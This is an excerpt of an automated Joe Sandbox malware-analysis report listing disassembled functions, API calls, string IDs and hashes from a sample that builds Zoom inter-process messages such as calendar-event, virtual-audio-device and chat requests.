                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$ArchiveArchive@$CriticalH_prolog3PackageSectionStringTree@$EnterH_prolog3_LeaveMessageNode@23@Root@Template_1@Tree
                • String ID: com.zoom.app.assistant.sip.virtual.audio.device.created.notification$deviceGUID
                • API String ID: 4281283084-4241061185
                • Opcode ID: a878ff8a70fee8c2db403dbb582567aef9b41725b8df0807bdd0fcbded0da6ce
                • Instruction ID: 584d35c519adbf3ee5bc9859804fe726abe5864e15d753864435801404a4e7b9
                • Opcode Fuzzy Hash: a878ff8a70fee8c2db403dbb582567aef9b41725b8df0807bdd0fcbded0da6ce
                • Instruction Fuzzy Hash: 2BE0DFB0A00384A7EB30BF14AC95B2E36A4AB90B5AF94457CB2045F382CFF84940E774
                APIs
                • __EH_prolog3.LIBCMT ref: 00C6A407
                • ??0?$CmmMessageTemplate_1@V?$CStringT@_W@Cmm@@@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(com.zoom.app.notifyDeviceReady,0000272D,Param,00000004), ref: 00C6A422
                  • Part of subcall function 00C5D860: __EH_prolog3.LIBCMT ref: 00C5D867
                  • Part of subcall function 00C5D3E7: __EH_prolog3_GS.LIBCMT ref: 00C5D3EE
                  • Part of subcall function 00C5D3E7: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events,00009E6A,strJsonEvents,00000004), ref: 00C5D40B
                  • Part of subcall function 00C5D3E7: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events,00009E6A,strJsonEvents,00000004), ref: 00C5D439
                  • Part of subcall function 00C5D3E7: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events), ref: 00C5D479
                  • Part of subcall function 00C5D3E7: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events), ref: 00C5D4A8
                  • Part of subcall function 00C5D3E7: EnterCriticalSection.KERNEL32(?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048), ref: 00C5D4FB
                  • Part of subcall function 00C5D3E7: LeaveCriticalSection.KERNEL32(?,?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?), ref: 00C5D518
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$ArchiveArchive@String$CriticalH_prolog3PackageSectionTree@$Cmm@@@EnterH_prolog3_LeaveMessageNode@23@Root@Template_1@Tree
                • String ID: Param$com.zoom.app.notifyDeviceReady
                • API String ID: 3166440930-3217939805
                • Opcode ID: 1d3542ce7465f31ba74ebcaa6b033d733af760e32fe6c4c55064bf0be34549df
                • Instruction ID: e0ba903a086d537c5d7f0650fb528581fcf4122cd0d04d1e4d5adbd15b60003d
                • Opcode Fuzzy Hash: 1d3542ce7465f31ba74ebcaa6b033d733af760e32fe6c4c55064bf0be34549df
                • Instruction Fuzzy Hash: E7E020F0900380D7C720AB505C89F6E66B4EF58766F40042DB2055F3D1CBF44844D776
                APIs
                • __EH_prolog3.LIBCMT ref: 00C70417
                • ??0?$CmmMessageTemplate_1@H@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(com.zoom.app.assistant.sip.virtual.audio.device.destroy.response,00009CF5,deviceGUID,00000004), ref: 00C70432
                  • Part of subcall function 00C866A0: __EH_prolog3.LIBCMT ref: 00C866A7
                  • Part of subcall function 00C89E35: __EH_prolog3_GS.LIBCMT ref: 00C89E3C
                  • Part of subcall function 00C89E35: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000048,00C6AD3D,com.Zoom.app.conf.claimhost,HostSnsType,com.Zoom.app.conf.claimhost,00002735,HostSnsType,00000004), ref: 00C89E59
                  • Part of subcall function 00C89E35: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,00000048,00C6AD3D,com.Zoom.app.conf.claimhost,HostSnsType,com.Zoom.app.conf.claimhost,00002735,HostSnsType,00000004), ref: 00C89E87
                  • Part of subcall function 00C89E35: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C6AD3D,com.Zoom.app.conf.claimhost,HostSnsType,com.Zoom.app.conf.claimhost), ref: 00C89EC7
                  • Part of subcall function 00C89E35: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C6AD3D,com.Zoom.app.conf.claimhost), ref: 00C89EF6
                  • Part of subcall function 00C89E35: EnterCriticalSection.KERNEL32(?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048), ref: 00C89F49
                  • Part of subcall function 00C89E35: LeaveCriticalSection.KERNEL32(?,?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?), ref: 00C89F66
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$ArchiveArchive@$CriticalH_prolog3PackageSectionStringTree@$EnterH_prolog3_LeaveMessageNode@23@Root@Template_1@Tree
                • String ID: com.zoom.app.assistant.sip.virtual.audio.device.destroy.response$deviceGUID
                • API String ID: 4281283084-803702959
                • Opcode ID: 665d6f0a49dd4f55aeac4beb2a2e5c126191c602936c6978bdafb29e899cbfd8
                • Instruction ID: d5113ebb36bb84054e2f17a526f52e93a3181fb68ea0ff3dac5fda2486bc79ac
                • Opcode Fuzzy Hash: 665d6f0a49dd4f55aeac4beb2a2e5c126191c602936c6978bdafb29e899cbfd8
                • Instruction Fuzzy Hash: 24E0D8B0900384A7D710BF119C45F2E26A4DB41B15F904428B2045F392CFF44800DB74
                APIs
                • __EH_prolog3.LIBCMT ref: 00C6C5F7
                • ??0?$CmmMessageTemplate_1@H@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(com.Zoom.app.conf.inter.process.audio.sharing.service.register.request,000027D5,needUserAudio,00000004), ref: 00C6C612
                  • Part of subcall function 00C866A0: __EH_prolog3.LIBCMT ref: 00C866A7
                  • Part of subcall function 00C89E35: __EH_prolog3_GS.LIBCMT ref: 00C89E3C
                  • Part of subcall function 00C89E35: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000048,00C6AD3D,com.Zoom.app.conf.claimhost,HostSnsType,com.Zoom.app.conf.claimhost,00002735,HostSnsType,00000004), ref: 00C89E59
                  • Part of subcall function 00C89E35: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,00000048,00C6AD3D,com.Zoom.app.conf.claimhost,HostSnsType,com.Zoom.app.conf.claimhost,00002735,HostSnsType,00000004), ref: 00C89E87
                  • Part of subcall function 00C89E35: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C6AD3D,com.Zoom.app.conf.claimhost,HostSnsType,com.Zoom.app.conf.claimhost), ref: 00C89EC7
                  • Part of subcall function 00C89E35: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C6AD3D,com.Zoom.app.conf.claimhost), ref: 00C89EF6
                  • Part of subcall function 00C89E35: EnterCriticalSection.KERNEL32(?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048), ref: 00C89F49
                  • Part of subcall function 00C89E35: LeaveCriticalSection.KERNEL32(?,?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?), ref: 00C89F66
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$ArchiveArchive@$CriticalH_prolog3PackageSectionStringTree@$EnterH_prolog3_LeaveMessageNode@23@Root@Template_1@Tree
                • String ID: com.Zoom.app.conf.inter.process.audio.sharing.service.register.request$needUserAudio
                • API String ID: 4281283084-1390595588
                • Opcode ID: dfcb524af863806ff8ae9f784d6333218293403f2be8a543ab714aac97dfe890
                • Instruction ID: 607dae75b463fe942db63fae47d1ec896c5bf3ecdaa379bad14ccb4c9f67a10c
                • Opcode Fuzzy Hash: dfcb524af863806ff8ae9f784d6333218293403f2be8a543ab714aac97dfe890
                • Instruction Fuzzy Hash: DEE0D8B09443C0A7D720BB148C4972F26A4AB4071AF800568B2455F3C2DBF44841D774
                APIs
                • __EH_prolog3.LIBCMT ref: 00C70597
                • ??0?$CmmMessageTemplate_1@H@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(com.zoom.app.assistant.sip.virtual.audio.speaker.destroy.response,00009CF9,deviceGUID,00000004), ref: 00C705B2
                  • Part of subcall function 00C866A0: __EH_prolog3.LIBCMT ref: 00C866A7
                  • Part of subcall function 00C89E35: __EH_prolog3_GS.LIBCMT ref: 00C89E3C
                  • Part of subcall function 00C89E35: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000048,00C6AD3D,com.Zoom.app.conf.claimhost,HostSnsType,com.Zoom.app.conf.claimhost,00002735,HostSnsType,00000004), ref: 00C89E59
                  • Part of subcall function 00C89E35: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,00000048,00C6AD3D,com.Zoom.app.conf.claimhost,HostSnsType,com.Zoom.app.conf.claimhost,00002735,HostSnsType,00000004), ref: 00C89E87
                  • Part of subcall function 00C89E35: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C6AD3D,com.Zoom.app.conf.claimhost,HostSnsType,com.Zoom.app.conf.claimhost), ref: 00C89EC7
                  • Part of subcall function 00C89E35: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C6AD3D,com.Zoom.app.conf.claimhost), ref: 00C89EF6
                  • Part of subcall function 00C89E35: EnterCriticalSection.KERNEL32(?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048), ref: 00C89F49
                  • Part of subcall function 00C89E35: LeaveCriticalSection.KERNEL32(?,?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?), ref: 00C89F66
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$ArchiveArchive@$CriticalH_prolog3PackageSectionStringTree@$EnterH_prolog3_LeaveMessageNode@23@Root@Template_1@Tree
                • String ID: com.zoom.app.assistant.sip.virtual.audio.speaker.destroy.response$deviceGUID
                • API String ID: 4281283084-1561118242
                • Opcode ID: 72fd7e817c16abb4b95726115679cfabde61b121000da52709070069e622cb90
                • Instruction ID: 0b1d0b7e7f7cb0c0b9c75ad96636a52b6568cb88949aa5ddd302daf13eb74035
                • Opcode Fuzzy Hash: 72fd7e817c16abb4b95726115679cfabde61b121000da52709070069e622cb90
                • Instruction Fuzzy Hash: 38E0D870A00385E7D720BB508C96B2F26A4A741B15F904969B2046B382CFF54800D778
                APIs
                • __EH_prolog3.LIBCMT ref: 00C6E557
                • ??0?$CmmMessageTemplate_1@V?$CStringT@_W@Cmm@@@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(com.zoom.app.assistant.control.system.call.device.succeed.notify,00009D1E,Context,00000004), ref: 00C6E572
                  • Part of subcall function 00C5D860: __EH_prolog3.LIBCMT ref: 00C5D867
                  • Part of subcall function 00C5D3E7: __EH_prolog3_GS.LIBCMT ref: 00C5D3EE
                  • Part of subcall function 00C5D3E7: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events,00009E6A,strJsonEvents,00000004), ref: 00C5D40B
                  • Part of subcall function 00C5D3E7: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events,00009E6A,strJsonEvents,00000004), ref: 00C5D439
                  • Part of subcall function 00C5D3E7: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events), ref: 00C5D479
                  • Part of subcall function 00C5D3E7: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events), ref: 00C5D4A8
                  • Part of subcall function 00C5D3E7: EnterCriticalSection.KERNEL32(?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048), ref: 00C5D4FB
                  • Part of subcall function 00C5D3E7: LeaveCriticalSection.KERNEL32(?,?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?), ref: 00C5D518
                Strings
                Similarity
                • API ID: Cmm@@$??0?$ArchiveArchive@String$CriticalH_prolog3PackageSectionTree@$Cmm@@@EnterH_prolog3_LeaveMessageNode@23@Root@Template_1@Tree
                • String ID: Context$com.zoom.app.assistant.control.system.call.device.succeed.notify
                • API String ID: 3166440930-1563161936
                • Opcode ID: 8ccd75696bb70950307d5d491a23f508b3542e7895660d54b22a72513f3afb31
                • Instruction ID: 6a0e832500a1733fecfa310b64c64018c5797bf968b3daf066084a7c77721bc2
                • Opcode Fuzzy Hash: 8ccd75696bb70950307d5d491a23f508b3542e7895660d54b22a72513f3afb31
                • Instruction Fuzzy Hash: EFE0D8B4A007C167C7206B554C85B5E77A8B764717F40092DB6025F3D2CBF44844C7B4
                APIs
                • __EH_prolog3.LIBCMT ref: 00C72507
                • ??0?$CmmMessageTemplate_1@V?$CStringT@_W@Cmm@@@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(com.zoom.app.cci.ccivideo.removeuser.request,00009E7B,UserID,00000004), ref: 00C72522
                  • Part of subcall function 00C5D860: __EH_prolog3.LIBCMT ref: 00C5D867
                  • Part of subcall function 00C5D3E7: __EH_prolog3_GS.LIBCMT ref: 00C5D3EE
                  • Part of subcall function 00C5D3E7: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events,00009E6A,strJsonEvents,00000004), ref: 00C5D40B
                  • Part of subcall function 00C5D3E7: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events,00009E6A,strJsonEvents,00000004), ref: 00C5D439
                  • Part of subcall function 00C5D3E7: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events), ref: 00C5D479
                  • Part of subcall function 00C5D3E7: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events), ref: 00C5D4A8
                  • Part of subcall function 00C5D3E7: EnterCriticalSection.KERNEL32(?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048), ref: 00C5D4FB
                  • Part of subcall function 00C5D3E7: LeaveCriticalSection.KERNEL32(?,?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?), ref: 00C5D518
                Strings
                Similarity
                • API ID: Cmm@@$??0?$ArchiveArchive@String$CriticalH_prolog3PackageSectionTree@$Cmm@@@EnterH_prolog3_LeaveMessageNode@23@Root@Template_1@Tree
                • String ID: UserID$com.zoom.app.cci.ccivideo.removeuser.request
                • API String ID: 3166440930-2587538509
                • Opcode ID: 0c122066cdffb912bc6a828a6c7acdb5895a51c9788403265ebcf9b5d48b1399
                • Instruction ID: 48168506dc8d02c95057e996d45036178d0e042ee424cdb50e8dfafd38b0454c
                • Opcode Fuzzy Hash: 0c122066cdffb912bc6a828a6c7acdb5895a51c9788403265ebcf9b5d48b1399
                • Instruction Fuzzy Hash: E8E0DFB0A10394A7C760AB649C49B1EB2B4AF54B16F404528B2015B3E2CBF88984D77A
                APIs
                • __EH_prolog3.LIBCMT ref: 00C726E7
                • ??0?$CmmMessageTemplate_1@V?$CStringT@_W@Cmm@@@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(com.zoom.app.cci.ccivideo.onuserleave.notify,00009E79,UsersJson,00000004), ref: 00C72702
                  • Part of subcall function 00C5D860: __EH_prolog3.LIBCMT ref: 00C5D867
                  • Part of subcall function 00C5D3E7: __EH_prolog3_GS.LIBCMT ref: 00C5D3EE
                  • Part of subcall function 00C5D3E7: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events,00009E6A,strJsonEvents,00000004), ref: 00C5D40B
                  • Part of subcall function 00C5D3E7: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events,00009E6A,strJsonEvents,00000004), ref: 00C5D439
                  • Part of subcall function 00C5D3E7: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events), ref: 00C5D479
                  • Part of subcall function 00C5D3E7: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events), ref: 00C5D4A8
                  • Part of subcall function 00C5D3E7: EnterCriticalSection.KERNEL32(?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048), ref: 00C5D4FB
                  • Part of subcall function 00C5D3E7: LeaveCriticalSection.KERNEL32(?,?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?), ref: 00C5D518
                Strings
                Similarity
                • API ID: Cmm@@$??0?$ArchiveArchive@String$CriticalH_prolog3PackageSectionTree@$Cmm@@@EnterH_prolog3_LeaveMessageNode@23@Root@Template_1@Tree
                • String ID: UsersJson$com.zoom.app.cci.ccivideo.onuserleave.notify
                • API String ID: 3166440930-571527980
                • Opcode ID: ed0ddef71ba3a0699cb1a6e9fd21677fe0b195e4cf4b8e83b847358a65393929
                • Instruction ID: 76bfce0f59d1a20e5f5248c0fe62b26035b3772f58d71f1f71cc230ef89b418a
                • Opcode Fuzzy Hash: ed0ddef71ba3a0699cb1a6e9fd21677fe0b195e4cf4b8e83b847358a65393929
                • Instruction Fuzzy Hash: 3CE0DFB0A00380A7D320AB51DC45B1EB6B4AF50B16F404928B2425B3D2CBF44884C7B8
                APIs
                • __EH_prolog3.LIBCMT ref: 00C72687
                • ??0?$CmmMessageTemplate_1@V?$CStringT@_W@Cmm@@@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(com.zoom.app.cci.ccivideo.onuserjoin.notify,00009E78,UsersJson,00000004), ref: 00C726A2
                  • Part of subcall function 00C5D860: __EH_prolog3.LIBCMT ref: 00C5D867
                  • Part of subcall function 00C5D3E7: __EH_prolog3_GS.LIBCMT ref: 00C5D3EE
                  • Part of subcall function 00C5D3E7: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events,00009E6A,strJsonEvents,00000004), ref: 00C5D40B
                  • Part of subcall function 00C5D3E7: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events,00009E6A,strJsonEvents,00000004), ref: 00C5D439
                  • Part of subcall function 00C5D3E7: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events), ref: 00C5D479
                  • Part of subcall function 00C5D3E7: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events), ref: 00C5D4A8
                  • Part of subcall function 00C5D3E7: EnterCriticalSection.KERNEL32(?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048), ref: 00C5D4FB
                  • Part of subcall function 00C5D3E7: LeaveCriticalSection.KERNEL32(?,?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?), ref: 00C5D518
                Strings
                Similarity
                • API ID: Cmm@@$??0?$ArchiveArchive@String$CriticalH_prolog3PackageSectionTree@$Cmm@@@EnterH_prolog3_LeaveMessageNode@23@Root@Template_1@Tree
                • String ID: UsersJson$com.zoom.app.cci.ccivideo.onuserjoin.notify
                • API String ID: 3166440930-469550141
                • Opcode ID: d99ba9f6494ca53669422acbfaf3c96180cbc062bf2be98d9649d592c5266a6a
                • Instruction ID: 82458d086438280824fd42e550f6e415671296b1b627a519e4b1716f20c81d29
                • Opcode Fuzzy Hash: d99ba9f6494ca53669422acbfaf3c96180cbc062bf2be98d9649d592c5266a6a
                • Instruction Fuzzy Hash: 66E0D8B4A003C067D3207B508C8AB1E76B4ABD0B16F504529B2015B3D2CBF44884C779
                APIs
                • __EH_prolog3.LIBCMT ref: 00C766B7
                • ??0?$CmmMessageTemplate_1@H@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(com.zoom.ps.request_to_term,00013885,reason,00000004), ref: 00C766D2
                  • Part of subcall function 00C866A0: __EH_prolog3.LIBCMT ref: 00C866A7
                  • Part of subcall function 00C89E35: __EH_prolog3_GS.LIBCMT ref: 00C89E3C
                  • Part of subcall function 00C89E35: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000048,00C6AD3D,com.Zoom.app.conf.claimhost,HostSnsType,com.Zoom.app.conf.claimhost,00002735,HostSnsType,00000004), ref: 00C89E59
                  • Part of subcall function 00C89E35: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,00000048,00C6AD3D,com.Zoom.app.conf.claimhost,HostSnsType,com.Zoom.app.conf.claimhost,00002735,HostSnsType,00000004), ref: 00C89E87
                  • Part of subcall function 00C89E35: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C6AD3D,com.Zoom.app.conf.claimhost,HostSnsType,com.Zoom.app.conf.claimhost), ref: 00C89EC7
                  • Part of subcall function 00C89E35: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C6AD3D,com.Zoom.app.conf.claimhost), ref: 00C89EF6
                  • Part of subcall function 00C89E35: EnterCriticalSection.KERNEL32(?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048), ref: 00C89F49
                  • Part of subcall function 00C89E35: LeaveCriticalSection.KERNEL32(?,?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?), ref: 00C89F66
                Strings
                Similarity
                • API ID: Cmm@@$??0?$ArchiveArchive@$CriticalH_prolog3PackageSectionStringTree@$EnterH_prolog3_LeaveMessageNode@23@Root@Template_1@Tree
                • String ID: com.zoom.ps.request_to_term$reason
                • API String ID: 4281283084-660252024
                • Opcode ID: a999c344f16e847ac566d5a58e922d6b4bf63339836b325b9af6c9182f0059dd
                • Instruction ID: 5222b47bac14020762dda6a1f7da36666546099dd96bd7b27e9d5e31c98f41d6
                • Opcode Fuzzy Hash: a999c344f16e847ac566d5a58e922d6b4bf63339836b325b9af6c9182f0059dd
                • Instruction Fuzzy Hash: 42E0DFB0A00380A7D721BF14CC49B6E26A4AB81B19F84446CB3085B392CFF84941E775
                APIs
                • __EH_prolog3.LIBCMT ref: 00C74667
                • ??0?$CmmMessageTemplate_1@V?$CStringT@_W@Cmm@@@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(com.Zoom.app.conf.chat.with.buddy,0000277E,UserID,00000004), ref: 00C74682
                  • Part of subcall function 00C5D860: __EH_prolog3.LIBCMT ref: 00C5D867
                  • Part of subcall function 00C5D3E7: __EH_prolog3_GS.LIBCMT ref: 00C5D3EE
                  • Part of subcall function 00C5D3E7: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events,00009E6A,strJsonEvents,00000004), ref: 00C5D40B
                  • Part of subcall function 00C5D3E7: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events,00009E6A,strJsonEvents,00000004), ref: 00C5D439
